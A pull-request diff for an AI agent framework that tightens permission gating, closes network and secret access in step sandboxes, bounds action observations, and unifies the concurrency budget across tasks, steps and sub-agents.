### PR TITLE
fix(agents): close the step sandbox, unify the gate, budget every layer

### DIFF
--- a/.github/workflows/quality-checks.yml
+++ b/.github/workflows/quality-checks.yml
@@ -270,8 +270,17 @@ jobs:
           #      that break). Deliberately typecheck only — the full
           #      `next build`s cost minutes each and belong to deploys, not
           #      the PR gate.
+          #   8. `npm run capabilities:check` — the capability coverage table
+          #      (packages/cli/src/harness/capability-table.ts) regenerated
+          #      from the live registry and diffed against the checked-in one.
+          #      Fails on a capability with no suite, no eval case and no gap
+          #      note, and on a table the diff left stale. Imports
+          #      packages/cli/dist and packages/agents/dist, both in the
+          #      `build` job's artifact; nothing else ran it, so the invariant
+          #      packages/agents/AGENTS.md documents held only when someone
+          #      remembered to run it by hand.
           - check: typecheck
-            command: npm run typecheck && npm run lint:design --workspace=web && npm test --workspace=@nodetool-ai/base-nodes -- parity example-workflows && npm run validate:examples && npm run codegen:dsl:check && npm run build:sandbox-dsl:check && npm run build:sandbox-flow:check && npm run typecheck:examples
+            command: npm run typecheck && npm run lint:design --workspace=web && npm test --workspace=@nodetool-ai/base-nodes -- parity example-workflows && npm run validate:examples && npm run codegen:dsl:check && npm run build:sandbox-dsl:check && npm run build:sandbox-flow:check && npm run typecheck:examples && npm run capabilities:check
             mobile-deps: "true"
             extra-apt: ""
             is-test: "false"

--- a/docs/codeact-design.md
+++ b/docs/codeact-design.md
@@ -223,7 +223,13 @@ being shown. A denied action never runs, and the refusal is the observation.
 for the rest of the thread.
 
 It fails closed: a call with no `risk`, or one carrying anything outside the
-enum, reads as `high`. Plan and default modes are untouched — their per-call
+enum, reads as `high`. The program's own imports set a floor under the
+declaration (`importedActionRisk`): a static import of an `execute` or
+`external` capability — the calls that spend money or leave the account — is
+high whatever the call said, and a namespace import of a capability module
+takes that module's highest class. A `write` import stays at the declared
+risk, because a note the user asked for and a delete share the class and only
+the model can tell them apart. Plan and default modes are untouched — their per-call
 ladder already blocks or asks, and a second question per action would only
 double the prompts. Hosts with no one to ask (the MCP mount, the security
 monitor's pass in `Agent`) carry an always-allow `requestApproval`, so nothing

--- a/docs/javascript-sandbox.md
+++ b/docs/javascript-sandbox.md
@@ -75,7 +75,7 @@ libraries are imports.**
 
 | Global | What it does |
 |---|---|
-| `console.*` | Log lines land in the run's `logs` array. A Code node also posts each line as a `log_update` |
+| `console.*` | Log lines land in the run's `logs` array, capped by count and bytes (`MAX_COLLECTED_CONSOLE_LOGS` / `MAX_COLLECTED_CONSOLE_CHARS` in `js-sandbox.ts`) with one notice line when cut. A Code node also posts each line as a `log_update` |
 | `fetch(url, options?)` | HTTP, returning `{ok, status, headers, body, json, text(), arrayBuffer(), bytes()}`. A `Uint8Array` body is sent as raw bytes |
 | `workspace.*` | `read`, `write`, `list`, `readBytes`, `writeBytes`, `stat`, `root`, `copy`, `move`, `mkdir`, `remove`. Needs a `ProcessingContext` |
 | `getSecret(name)` | The run's secret store, limited to the run's declared secret scope |

--- a/packages/agents/AGENTS.md
+++ b/packages/agents/AGENTS.md
@@ -734,7 +734,7 @@ Everything mechanical is derived, so the table cannot rot:
 
 ```bash
 npm run capabilities:sync     # rewrite the table from the live registry
-npm run capabilities:check    # fail if it is stale (CI, and the gate)
+npm run capabilities:check    # fail if it is stale (the Quality Gate's typecheck leg)
 npm run dev:nodetool -- harness capabilities [--json] [--strict]
 ```
 
@@ -1041,7 +1041,10 @@ that object with `gateFromContext` instead of building a gate of its own
 same reason: `ProcessingContext.copy()` shallow-copies the variable bag, so a
 child shares the host's gate object rather than a clone, which is what makes a
 mid-turn `set_permission_mode` and an "allow for this chat" answer reach a loop
-that started before them.
+that started before them. A context carrying no gate still resolves to the
+headless `auto` gate, and `gateFromContext` logs that fallback at error level,
+so a host that forgot to set one shows up in the log rather than running
+silently ungated.
 
 | Host | Where its gate comes from | Mode | Approver |
 |---|---|---|---|
@@ -1216,10 +1219,19 @@ below.
 Nothing resolves a per-run policy object: `execute_plan` passes the run's
 budget and the parent's per-step iteration cap directly.
 
-`maxConcurrentAgents` alone bounds one merge, not the run — tasks, steps and
-sub-agents each apply it separately, so the three multiply. The run-level bound
-is the budget's semaphore below, which each DAG executor passes to
-`scheduleDag` as its permit pool while bounding its own schedule numerically.
+`maxConcurrentAgents` bounds one merge numerically (tasks per plan, steps per
+task), not the run. The run-level bound is the budget's permit pool below, and
+a permit stands for one open provider conversation, not one layer: a task takes
+none, each step holds one through `branchPool` (`subagent.ts`), and a child a
+step or sub-agent spawns runs on its parent's permit while the parent is idle
+in the spawning call and borrows from the run pool beyond that. A holder never
+queues for a second permit, so nesting cannot deadlock, and one pool bounds
+tasks, steps and sub-agents together (`run-budget-propagation.test.ts`, "bounds
+every layer"). `start_subtask` refuses past `MAX_BACKGROUND_SUBTASKS_PER_TURN`
+(`tools/start-subtask-tool.ts`) with `background_limit_reached`; a detached
+child still on its parent's permit can overlap the parent's next turn.
+Planning draws on the same budget: `TaskPlanner` takes a `budget` (falling back
+to the context's) and a refused turn stops planning naming the budget's reason.
 
 ### One budget per run (`@nodetool-ai/runtime` → `RunBudget`)
 
@@ -1230,7 +1242,7 @@ re-created by a child. `RunBudget` carries four:
 |---|---|---|
 | `turns` | a turn whose worst case would cross the USD cap | `NODETOOL_AGENT_TURN_COST_CAP_USD` |
 | `deadline` | any turn or tool call after the wall clock runs out | `NODETOOL_AGENT_TURN_DEADLINE_MS` |
-| `concurrency` | a branch beyond the run's open-conversation limit | `NODETOOL_AGENT_MAX_CONCURRENCY` |
+| `concurrency` | a permit past the run's pool — tasks, steps, nested executors and sub-agents all draw from it, a holder's own permit counting as one | `NODETOOL_AGENT_MAX_CONCURRENCY` |
 | `turnCount` | a turn past the run's cumulative total | `NODETOOL_AGENT_MAX_TURNS` |
 
 Spend admission is reserve-then-commit, because the next call's cost is only
@@ -1292,10 +1304,12 @@ A step that fails sets `step.failed` + `step.error` and leaves `completed`
 false, and its `step_result` carries the protocol-level `error` field. Nothing
 downstream may treat a failure as a satisfied dependency: the scheduler walks
 the failed node's transitive dependents and settles each as failed, naming the
-dependency directly above it, and a plan whose every task failed throws instead
-of compiling a deliverable out of nothing. The same holds one level up — a
-failed task blocks its dependent tasks — and a step or task the run's signal cut
-short settles as failed too, rather than being left looking like it is still
+dependency directly above it, and `execute_plan` answers a plan whose every
+task failed with `error: "plan_failed"` and the per-task failures rather than
+compiling a deliverable out of nothing; it does not throw. The same holds one
+level up — a failed task blocks its dependent tasks — and a step or task the
+run's signal cut short settles once as "Step aborted" / "Task aborted", never
+as "dependency failed", rather than being left looking like it is still
 running.
 
 ## CodeAct Execution (`src/codeact/`)
@@ -1307,8 +1321,10 @@ host-validated completion, and memory (`nodetool.memory.*`) for results
 a later action or turn needs — there is no cross-action variable bag. The
 prompt tells the model to record each generate/speak result (an `asset://` uri)
 with `nodetool.memory.save` and reuse it; local variables die with the action,
-and `return` is the observation only. Design and the
-research it follows (CodeAct, ICML 2024): docs/codeact-design.md.
+and `return` is the observation only. A step action runs with no guest
+`fetch` and no secret scope: network and secrets are reached only through the
+gated capabilities, the same rule the chat session's actions run under. Design
+and the research it follows (CodeAct, ICML 2024): docs/codeact-design.md.
 
 - `CodeActExecutor` keeps the message contract, memory writes, and failure
   semantics the step loop has always had — consumers work unchanged. Bridged
@@ -1558,8 +1574,11 @@ offender and runs nothing.
 Every message the executor yields is forwarded verbatim — the `task_update`
 events are what the thread and the sidebar render, so re-summarizing them would
 leave the user watching nothing until the end. The call returns each task's
-`completed`/`failed` (with the step and error behind a failure) plus a
-`results` map keyed by task id. The step results also stay in the run's shared
+`completed`/`failed` (with the step and error behind a failure), a `results`
+map keyed by task id, and beside it a `steps` map of per-step results, so a
+caller can read what one step produced without unpacking its task. A plan
+whose every task failed comes back as `error: "plan_failed"` with those
+failures, not as a throw. The step results also stay in the run's shared
 memory under `task:<id>`, which the description points at so the model reads
 one back with `read_shared` instead of redoing the work.
 

--- a/packages/agents/src/app-build/build.ts
+++ b/packages/agents/src/app-build/build.ts
@@ -56,6 +56,7 @@ import {
 } from "@nodetool-ai/execution/app-debug";
 import type { AuthorGraphOptions } from "../author-graph.js";
 import { authorGraph } from "../author-graph.js";
+import type { CapabilityGate } from "../capabilities/types.js";
 import {
   runAuthorStage,
   DEFAULT_AUTHOR_TURNS,
@@ -172,6 +173,11 @@ export interface BuildAppOptions {
   judge?: BuildJudgeOptions;
   /** Spend admission. Defaults to a cap-carrying budget over `costCapUsd`. */
   turnBudget?: TurnBudget;
+  /**
+   * The permission gate the authoring belt runs under. Omitted, `authorGraph`
+   * reads the gate on `context`.
+   */
+  gate?: CapabilityGate;
 
   signal?: AbortSignal;
   onLog?: (line: string) => void;
@@ -561,6 +567,7 @@ async function planGraph(
   };
   if (opts.providers) authorOptions.providers = opts.providers;
   if (opts.turnBudget) authorOptions.turnBudget = opts.turnBudget;
+  if (opts.gate) authorOptions.gate = opts.gate;
   if (opts.signal) authorOptions.signal = opts.signal;
   const generator = authorGraph(objective, authorOptions);
   let next = await generator.next();

--- a/packages/agents/src/author-graph.ts
+++ b/packages/agents/src/author-graph.ts
@@ -41,11 +41,13 @@ import type {
 import type { Tool } from "./tools/base-tool.js";
 import { toolForCapabilityName } from "./capabilities/lazy-tool.js";
 import {
-  UNGATED,
   createCapabilityRun,
   contextSecretAvailability,
+  gateFromContext,
+  type CapabilityGate,
   type CreateCapabilityRunOptions
 } from "./capabilities/index.js";
+import { gateTools } from "./capabilities/gate-tools.js";
 import {
   GRAPH_DSL_PACKAGE,
   catalogServesGraphDsl
@@ -124,6 +126,13 @@ export interface AuthorGraphOptions {
   threadId?: string;
   /** Provider rounds. Defaults to {@link AUTHOR_GRAPH_MAX_ITERATIONS}. */
   maxIterations?: number;
+  /**
+   * The permission gate the authoring belt runs under. `run_code` and
+   * `test_code` are execute-class, so the belt meets the same ladder the
+   * caller's other calls do. Omitted, the gate on {@link context} is read
+   * (`gateFromContext`), which is the parent run's when a host set one.
+   */
+  gate?: CapabilityGate;
 }
 
 /**
@@ -274,11 +283,16 @@ function resolveAuthoringBudget(opts: AuthorGraphOptions): RunBudget | undefined
 /**
  * Discovery, graph validation, and the Code-body harness — plus `find_model`
  * when providers are configured. Everything else the agent needs is the pack.
+ *
+ * The belt is wrapped in `gateTools` under the caller's gate: a lazy
+ * capability tool calls its implementation directly, so the gate on the run
+ * alone would cover what `run_code` invokes, not `run_code` itself.
  */
 export function buildAuthoringBelt(opts: AuthorGraphOptions): Tool[] {
+  const gate = opts.gate ?? gateFromContext(opts.context, "authorGraph");
   const runOptions: CreateCapabilityRunOptions = {
     context: opts.context,
-    gate: UNGATED,
+    gate,
     // The belt's capabilities run inside the authoring run, so they share its
     // budget rather than starting one.
     budget: resolveAuthoringBudget(opts),
@@ -298,7 +312,10 @@ export function buildAuthoringBelt(opts: AuthorGraphOptions): Tool[] {
       "authorGraph has no configured providers — `find_model` is off the belt, so AI work falls back to the model-less Agent node."
     );
   }
-  return names.map((name) => toolForCapabilityName(name, run));
+  return gateTools(
+    names.map((name) => toolForCapabilityName(name, run)),
+    gate
+  );
 }
 
 /**

--- a/packages/agents/src/capabilities/adapters.ts
+++ b/packages/agents/src/capabilities/adapters.ts
@@ -13,6 +13,7 @@ import type { ZodType } from "zod";
 import { Tool } from "../tools/base-tool.js";
 import { permissionCategoryFor } from "../tools/tool-permissions.js";
 import { withSnakeCaseAliases } from "./args.js";
+import { capabilitySpec } from "./registry.js";
 import type {
   CapabilityExport,
   CapabilityImpl,
@@ -106,16 +107,19 @@ export function toolFromCapability(
 }
 
 /**
- * Wrap an existing `Tool` as a capability. The category comes from the
- * classification map the gate reads today, so a tool that has not been ported
- * keeps exactly the class it is gated at now.
+ * Wrap an existing `Tool` as a capability. The category is the registered
+ * spec's when the name is a capability, so `gateTools` decides exactly as
+ * `run.invoke` does for the same name; the classification map is consulted
+ * only for a `Tool` that is not a capability, where the map is the one place
+ * its class is declared.
  */
 export function capabilityFromTool(tool: Tool): CapabilityExport {
   const spec: CapabilitySpec = {
     name: tool.name,
     description: tool.description,
     inputSchema: tool.inputSchema,
-    category: permissionCategoryFor(tool.name),
+    category:
+      capabilitySpec(tool.name)?.category ?? permissionCategoryFor(tool.name),
     needsToolCallId: tool.needsToolCallId,
     userMessage: (args) => tool.userMessage(args)
   };

--- a/packages/agents/src/capabilities/agents.ts
+++ b/packages/agents/src/capabilities/agents.ts
@@ -189,15 +189,28 @@ const createPlan: CapabilityExport = {
       provider: runtime.provider,
       model: runtime.model,
       tools: runtime.parentTools().filter((t) => t.name !== createPlanSpec.name),
+      // The run's budget: planning turns spend the same cap as the steps.
+      budget: runtime.budget,
       signal: run.context.signal
     });
 
     const generator = planner.planMultiTask(objective, run.context);
+    // The planner says why it stopped only through its final failed
+    // `planning_update`, so keep that for the model rather than guessing.
+    let failure: string | null = null;
     let next = await generator.next();
     while (!next.done) {
+      const message = next.value;
+      if (
+        message.type === "planning_update" &&
+        message.status === "failed" &&
+        isNonEmptyString(message.content)
+      ) {
+        failure = message.content;
+      }
       // The plan is the deliverable, so it goes to the user as it is built
       // rather than being summarized back by the model afterwards.
-      await runtime.forwardMessage(next.value);
+      await runtime.forwardMessage(message);
       next = await generator.next();
     }
     const plan = next.value;
@@ -206,6 +219,7 @@ const createPlan: CapabilityExport = {
       return {
         error: "plan_failed",
         message:
+          failure ??
           "The planner did not commit a plan. The objective may be too vague to decompose — restate it with the concrete outcome and try again."
       };
     }
@@ -363,6 +377,18 @@ const executePlan: CapabilityExport = {
 
     const failed = new Set(executor.getFailedTaskIds());
     const results: Record<string, unknown> = {};
+    // Every completed step's own result, keyed by step id. A task's result is
+    // its last step's, so what the siblings produced would otherwise reach the
+    // model only through `read_shared`. A failed step's `{ error }` payload is
+    // reported through its task, not here.
+    const steps: Record<string, unknown> = {};
+    for (const task of plan.tasks) {
+      for (const step of task.steps) {
+        if (!step.completed) continue;
+        const value = run.context.memory.getValue(memoryKeys.step(step.id));
+        if (value !== undefined) steps[step.id] = value;
+      }
+    }
     const tasks: ExecutedTask[] = plan.tasks.map((task) => {
       if (failed.has(task.id)) {
         return {
@@ -390,15 +416,30 @@ const executePlan: CapabilityExport = {
       return { id: task.id, title: task.title, status: "completed" };
     });
 
-    return {
+    const completedCount = tasks.filter((t) => t.status === "completed").length;
+    const failedCount = tasks.filter((t) => t.status === "failed").length;
+    const report = {
       title: plan.title,
       executed: true,
       task_count: tasks.length,
-      completed_count: tasks.filter((t) => t.status === "completed").length,
-      failed_count: tasks.filter((t) => t.status === "failed").length,
+      completed_count: completedCount,
+      failed_count: failedCount,
       tasks,
-      results
+      results,
+      steps
     };
+    // Nothing succeeded: an error the model cannot read as a deliverable,
+    // rather than a success-shaped object with empty results.
+    if (completedCount === 0 && failedCount > 0) {
+      return {
+        error: "plan_failed",
+        message: `Every task of "${plan.title}" failed: ${tasks
+          .map((t) => `${t.id}: ${t.error ?? "unknown error"}`)
+          .join("; ")}`,
+        ...report
+      };
+    }
+    return report;
   }
 };
 

--- a/packages/agents/src/capabilities/gate-from-context.ts
+++ b/packages/agents/src/capabilities/gate-from-context.ts
@@ -12,11 +12,32 @@
  * bundled backend).
  */
 
+import { createLogger } from "@nodetool-ai/config";
 import {
   headlessGate,
   type PermissionGateOptions
 } from "../tools/tool-permissions.js";
 import { PERMISSION_GATE_CONTEXT_KEY } from "../types.js";
+
+const log = createLogger("nodetool.agents.gate-from-context");
+
+/**
+ * Hosts already reported for running with no gate on their context. The
+ * headless gate is `auto`, so a host that forgot to set one gets every
+ * category allowed with nobody to ask — worth one error line per host per
+ * process, not one per call.
+ */
+const reportedGateless = new Set<string>();
+
+function reportGateless(hostName: string, reason: string): void {
+  if (reportedGateless.has(hostName)) return;
+  reportedGateless.add(hostName);
+  log.error(
+    `${hostName}: ${reason}; falling back to the headless gate (mode auto, ` +
+      "every escalation denied). A host with a user to ask must set " +
+      "PERMISSION_GATE_CONTEXT_KEY on the run's context."
+  );
+}
 
 /**
  * Minimal reader for the context bag, so this stays free of a context import.
@@ -57,7 +78,17 @@ export function gateFromContext(
   context: PermissionGateContext | undefined | null,
   hostName: string
 ): PermissionGateOptions {
-  if (typeof context?.get !== "function") return headlessGate(hostName);
+  if (typeof context?.get !== "function") {
+    reportGateless(hostName, "no context to read a permission gate from");
+    return headlessGate(hostName);
+  }
   const value = context.get<unknown>(PERMISSION_GATE_CONTEXT_KEY);
-  return isPermissionGate(value) ? value : headlessGate(hostName);
+  if (isPermissionGate(value)) return value;
+  reportGateless(
+    hostName,
+    value === undefined
+      ? "no permission gate on the context"
+      : "the value under PERMISSION_GATE_CONTEXT_KEY is not a permission gate"
+  );
+  return headlessGate(hostName);
 }

--- a/packages/agents/src/codeact/codeact-executor.ts
+++ b/packages/agents/src/codeact/codeact-executor.ts
@@ -1071,32 +1071,48 @@ export class CodeActExecutor {
             ? { truncated: false }
             : boundActionPayload(outcome.result, outcome.logs);
 
+          // Field order is the truncation order: the small leading fields
+          // must survive a cut that lands in `result` or `logs`.
           const observation: ActionObservation = {
             ok: outcome.success,
-            ...(finished !== undefined ? { finished } : {}),
-            ...(note !== undefined ? { note } : {}),
-            ...(repeated
-              ? {
-                  error:
-                    `This exact program was already run ${this.repeatedFailures} ` +
-                    `times in a row and failed the same way each time: ` +
-                    `${failure?.error ?? ""}. Do not resubmit it unchanged. ` +
-                    `Change the code or the approach, or finish with what ` +
-                    `you have and explain what could not be done.`,
-                  repeated: true
-                }
-              : (failure ?? {})),
-            ...(dropped > 0
-              ? {
-                  imagesDropped:
-                    `${dropped} image(s) beyond the ${MAX_ACTION_IMAGES}-per-action ` +
-                    `cap were not forwarded. View fewer images per action.`
-                }
-              : {}),
-            toolCalls: bridge.callCount(),
-            ...(payload.result !== undefined ? { result: payload.result } : {}),
-            ...(payload.logs !== undefined ? { logs: payload.logs } : {})
+            toolCalls: 0
           };
+          if (finished !== undefined) {
+            observation.finished = finished;
+          }
+          if (note !== undefined) {
+            observation.note = note;
+          }
+          if (repeated) {
+            observation.error =
+              `This exact program was already run ${this.repeatedFailures} ` +
+              `times in a row and failed the same way each time: ` +
+              `${failure?.error ?? ""}. Do not resubmit it unchanged. ` +
+              `Change the code or the approach, or finish with what ` +
+              `you have and explain what could not be done.`;
+            observation.repeated = true;
+          } else if (failure) {
+            if (failure.error !== undefined) {
+              observation.error = failure.error;
+            }
+            if (failure.stack !== undefined) {
+              observation.stack = failure.stack;
+            }
+          }
+          if (dropped > 0) {
+            observation.imagesDropped =
+              `${dropped} image(s) beyond the ${MAX_ACTION_IMAGES}-per-action ` +
+              `cap were not forwarded. View fewer images per action.`;
+          }
+          // `toolCalls` was created first to hold the key slot ahead of
+          // `result` and `logs`; the count is known only now.
+          observation.toolCalls = bridge.callCount();
+          if (payload.result !== undefined) {
+            observation.result = payload.result;
+          }
+          if (payload.logs !== undefined) {
+            observation.logs = payload.logs;
+          }
 
           // The leading fields are first and the two big ones are already
           // bounded, so this only ever trims an oversized error text.
@@ -1110,11 +1126,13 @@ export class CodeActExecutor {
             "agent.action.tool_calls": observation.toolCalls,
             "agent.action.ok": outcome.success,
             "agent.action.truncated":
-              payload.truncated || text.length > MAX_TOOL_RESULT_CHARS,
-            ...(observation.error !== undefined
-              ? { "agent.action.error": observation.error.slice(0, 500) }
-              : {})
+              payload.truncated || text.length > MAX_TOOL_RESULT_CHARS
           });
+          if (observation.error !== undefined) {
+            span?.setAttributes({
+              "agent.action.error": observation.error.slice(0, 500)
+            });
+          }
           return images.length > 0
             ? [{ type: "text", text }, ...images]
             : text;

--- a/packages/agents/src/codeact/codeact-executor.ts
+++ b/packages/agents/src/codeact/codeact-executor.ts
@@ -31,6 +31,7 @@ import {
   isToolCall,
   memoryKeys,
   withAgentSpanGen,
+  withSpan,
   mediaResolverFor,
   generationRegistry,
   type ActiveModelSelection
@@ -48,7 +49,11 @@ import {
 import type { Step, Task } from "../types.js";
 import { Tool } from "../tools/base-tool.js";
 import { getSharedTools } from "../tools/shared-tools.js";
-import { runInSandbox, type SandboxClock } from "../js-sandbox.js";
+import {
+  runInSandbox,
+  type SandboxClock,
+  type SandboxLimits
+} from "../js-sandbox.js";
 import type { CapabilityRun } from "../capabilities/types.js";
 import { sandboxCapabilitySpecifier } from "@nodetool-ai/protocol";
 
@@ -58,7 +63,14 @@ import {
   SESSION_CAPABILITY_MODULE,
   type MountCapabilityModulesOptions
 } from "./capability-modules.js";
-import { truncateToolResult } from "../constants.js";
+import {
+  ACTION_TRUNCATION_ADVICE,
+  MAX_ACTION_IMAGES,
+  MAX_ACTION_LOGS_CHARS,
+  MAX_ACTION_RESULT_CHARS,
+  MAX_TOOL_RESULT_CHARS,
+  truncateToolResult
+} from "../constants.js";
 import {
   formatViolations,
   validateAgainstSchema
@@ -142,6 +154,26 @@ export const DEFAULT_CODEACT_MAX_ITERATIONS = 20;
  * codeact norm.
  */
 export const DEFAULT_CODEACT_ACTION_TIMEOUT_MS = 600_000;
+
+/**
+ * The sandbox a step action runs in is closed: no bare `fetch` and no secret.
+ * The belt is the network — `nodetool.web.*`, `http_request`, the capability
+ * imports — and every one of those runs behind the permission gate and the
+ * SSRF guard, which a bare `fetch(url)` with a `getSecret(...)` header did
+ * not. Same shape the chat session passes.
+ */
+export const STEP_ACTION_SANDBOX_LIMITS: SandboxLimits = {
+  maxFetchCalls: 0,
+  secretScope: []
+};
+
+/**
+ * Consecutive actions with identical code and an identical error before the
+ * observation stops describing the failure and says the program was already
+ * run. A model resubmitting the same crashing program otherwise spends the
+ * whole iteration budget reading the same error.
+ */
+export const REPEATED_ACTION_LIMIT = 2;
 
 // The `execute_code` contract lives beside the auto-mode admission that reads
 // it (execute-code-contract.ts); re-exported here so every importer keeps its
@@ -232,15 +264,10 @@ export const CODEACT_RESIDENT_TOOL_NAMES: ReadonlySet<string> = new Set([
   // Search family — every discovery entry point stays top level.
   "web_search",
   "image_search",
-  "search_nodes",
   "run_search",
   "asset_search",
   "grep",
   "glob",
-  // Web + retrieval.
-  "browser",
-  "http_request",
-  "download_file",
   // Host media binaries.
   "ffmpeg",
   "yt_dlp",
@@ -249,14 +276,19 @@ export const CODEACT_RESIDENT_TOOL_NAMES: ReadonlySet<string> = new Set([
   "read_file",
   "write_file",
   "edit_file",
-  "list_directory",
   // Shared agent memory.
   "list_shared",
   "read_shared",
-  "share_result",
-  // Delegation.
-  "run_subtask"
+  "share_result"
 ]);
+// Not listed: `list_directory`, `browser`, `http_request`, `download_file`,
+// `run_subtask`, `search_nodes`. They are in `DIRECT_TOOL_NAMES` and no SDK
+// built-in replaces them, so every host documents them as direct tools and the
+// coverage pass below removed them from the catalog before the split — a
+// resident entry for them never rendered. The names that stay are covered
+// only conditionally: the file set and `web_search` are subtracted from the
+// direct offer on the MCP mount, and the rest depend on the object model
+// being loaded for the belt.
 
 /**
  * Toolbelts at or below this size skip the split entirely — deferring three
@@ -326,17 +358,79 @@ export interface CodeActExecutorOptions {
   capabilityRun?: CapabilityRun;
 }
 
-/** Observation envelope returned to the model after each code action. */
+/**
+ * Observation envelope returned to the model after each code action.
+ *
+ * Field order is the serialization order, and it matters: the verdict fields
+ * come first and `result`/`logs` last, each bounded on its own, so a large
+ * return value can never push `finished: false` and its note out of the
+ * envelope.
+ */
 interface ActionObservation {
   ok: boolean;
-  result?: unknown;
-  error?: string;
-  stack?: string;
-  logs?: string[];
   finished?: boolean;
   /** Why `finished` is false, when the action looked like it finished. */
   note?: string;
+  error?: string;
+  stack?: string;
+  /** Set when this program was already run and failed the same way. */
+  repeated?: boolean;
+  /** How many images past {@link MAX_ACTION_IMAGES} were not forwarded. */
+  imagesDropped?: string;
   toolCalls: number;
+  result?: unknown;
+  logs?: string[];
+}
+
+/**
+ * `result` and `logs` for the envelope, each cut to its own budget. Returns
+ * whether either was cut, for the action span.
+ */
+function boundActionPayload(
+  result: unknown,
+  logs: readonly string[] | undefined
+): { result?: unknown; logs?: string[]; truncated: boolean } {
+  const out: { result?: unknown; logs?: string[]; truncated: boolean } = {
+    truncated: false
+  };
+  if (result !== undefined) {
+    const json = JSON.stringify(result);
+    if (json !== undefined && json.length > MAX_ACTION_RESULT_CHARS) {
+      out.result = truncateToolResult(
+        json,
+        MAX_ACTION_RESULT_CHARS,
+        ACTION_TRUNCATION_ADVICE
+      );
+      out.truncated = true;
+    } else {
+      out.result = result;
+    }
+  }
+  if (logs !== undefined && logs.length > 0) {
+    const kept: string[] = [];
+    let chars = 0;
+    let whole = 0;
+    for (const line of logs) {
+      if (chars + line.length > MAX_ACTION_LOGS_CHARS) {
+        // A first line larger than the whole budget keeps its head, so the
+        // observation shows what was logged rather than nothing.
+        if (kept.length === 0) kept.push(line.slice(0, MAX_ACTION_LOGS_CHARS));
+        break;
+      }
+      kept.push(line);
+      chars += line.length;
+      whole++;
+    }
+    if (whole < logs.length) {
+      kept.push(
+        `... [${logs.length - whole} of ${logs.length} log lines omitted past ` +
+          `${MAX_ACTION_LOGS_CHARS} characters. Log less: ${ACTION_TRUNCATION_ADVICE}]`
+      );
+      out.truncated = true;
+    }
+    out.logs = kept;
+  }
+  return out;
 }
 
 /**
@@ -423,6 +517,9 @@ export class CodeActExecutor {
   private readonly graphQueues: Record<string, unknown> = {};
   private result: unknown = null;
   private actionCount = 0;
+  /** The last failed action, for {@link REPEATED_ACTION_LIMIT}. */
+  private lastFailure: { code: string; error: string } | null = null;
+  private repeatedFailures = 0;
 
   constructor(opts: CodeActExecutorOptions) {
     this.task = opts.task;
@@ -875,70 +972,154 @@ export class CodeActExecutor {
       this.actionCount++;
       bridge.resetActionBudget();
 
-      const outcome = await runInSandbox({
-        code: `${this.prelude}\n${code}`,
-        context: this.context,
-        timeoutMs: this.actionTimeoutMs ?? DEFAULT_CODEACT_ACTION_TIMEOUT_MS,
-        // The linked controller, not the caller's raw signal: it fires for the
-        // caller's cancellation *and* for a deadline that expires mid-action,
-        // which is the only way an in-flight program is stopped.
-        signal: abort.signal,
-        clock: this.clock,
-        modules: mount.modules,
-        capabilities: platform.mount,
-        globals: {
-          ...bridge.globals,
-          __finish: finishBridge,
-          __searchTools: searchToolsBridge,
-          __graphQueues: this.graphQueues
+      // One span per action; bridged calls inside it are not spanned.
+      return withSpan(
+        "agent.action",
+        {
+          "agent.step.id": this.step.id,
+          "agent.action.index": this.actionCount,
+          "agent.action.code_length": code.length
+        },
+        async (span) => {
+          const startedAt = Date.now();
+          const outcome = await runInSandbox({
+            code: `${this.prelude}\n${code}`,
+            context: this.context,
+            timeoutMs:
+              this.actionTimeoutMs ?? DEFAULT_CODEACT_ACTION_TIMEOUT_MS,
+            // The linked controller, not the caller's raw signal: it fires
+            // for the caller's cancellation *and* for a deadline that expires
+            // mid-action, which is the only way an in-flight program is
+            // stopped.
+            signal: abort.signal,
+            clock: this.clock,
+            limits: STEP_ACTION_SANDBOX_LIMITS,
+            modules: mount.modules,
+            capabilities: platform.mount,
+            globals: {
+              ...bridge.globals,
+              __finish: finishBridge,
+              __searchTools: searchToolsBridge,
+              __graphQueues: this.graphQueues
+            }
+          });
+
+          const failure = outcome.success
+            ? null
+            : annotateFailure(
+                outcome.error,
+                outcome.stack,
+                this.prelude,
+                code
+              );
+
+          // A validated finish() completes the step even when the action
+          // crashed after recording it — the model cannot retract a validated
+          // result.
+          let finished: boolean | undefined;
+          let note: string | undefined;
+          if (finishedResult) {
+            finished = true;
+            this.storeCompletionResult(finishedResult.value);
+            ui.push(this.taskUpdate(TaskUpdateEvent.StepCompleted));
+            ui.push(this.stepResult(finishedResult.value));
+            abort.abort();
+          } else if (
+            this.resultSchema !== null &&
+            outcome.success &&
+            outcome.result !== undefined &&
+            outcome.result !== null
+          ) {
+            // The action produced a value and ended the turn without
+            // finishing. Say so in the observation: an absent `finished`
+            // reads as success.
+            finished = false;
+            note =
+              validateAgainstSchema(outcome.result, this.resultSchema)
+                .length === 0
+                ? RETURN_MATCHES_SCHEMA_NOTE
+                : RETURN_IS_NOT_FINISH_NOTE;
+          }
+
+          // The same program failing the same way twice in a row: say so
+          // instead of describing the failure a second time.
+          let repeated = false;
+          if (failure !== null) {
+            const error = failure.error ?? "";
+            const trimmed = code.trim();
+            if (
+              this.lastFailure !== null &&
+              this.lastFailure.code === trimmed &&
+              this.lastFailure.error === error
+            ) {
+              this.repeatedFailures++;
+            } else {
+              this.repeatedFailures = 1;
+            }
+            this.lastFailure = { code: trimmed, error };
+            repeated = this.repeatedFailures >= REPEATED_ACTION_LIMIT;
+          } else {
+            this.lastFailure = null;
+            this.repeatedFailures = 0;
+          }
+
+          // Pixels a tool returned during the action ride beside the
+          // observation as a provider image message; the observation itself
+          // stays light.
+          const { images, dropped } = bridge.drainImages();
+          const payload = repeated
+            ? { truncated: false }
+            : boundActionPayload(outcome.result, outcome.logs);
+
+          const observation: ActionObservation = {
+            ok: outcome.success,
+            ...(finished !== undefined ? { finished } : {}),
+            ...(note !== undefined ? { note } : {}),
+            ...(repeated
+              ? {
+                  error:
+                    `This exact program was already run ${this.repeatedFailures} ` +
+                    `times in a row and failed the same way each time: ` +
+                    `${failure?.error ?? ""}. Do not resubmit it unchanged. ` +
+                    `Change the code or the approach, or finish with what ` +
+                    `you have and explain what could not be done.`,
+                  repeated: true
+                }
+              : (failure ?? {})),
+            ...(dropped > 0
+              ? {
+                  imagesDropped:
+                    `${dropped} image(s) beyond the ${MAX_ACTION_IMAGES}-per-action ` +
+                    `cap were not forwarded. View fewer images per action.`
+                }
+              : {}),
+            toolCalls: bridge.callCount(),
+            ...(payload.result !== undefined ? { result: payload.result } : {}),
+            ...(payload.logs !== undefined ? { logs: payload.logs } : {})
+          };
+
+          // The leading fields are first and the two big ones are already
+          // bounded, so this only ever trims an oversized error text.
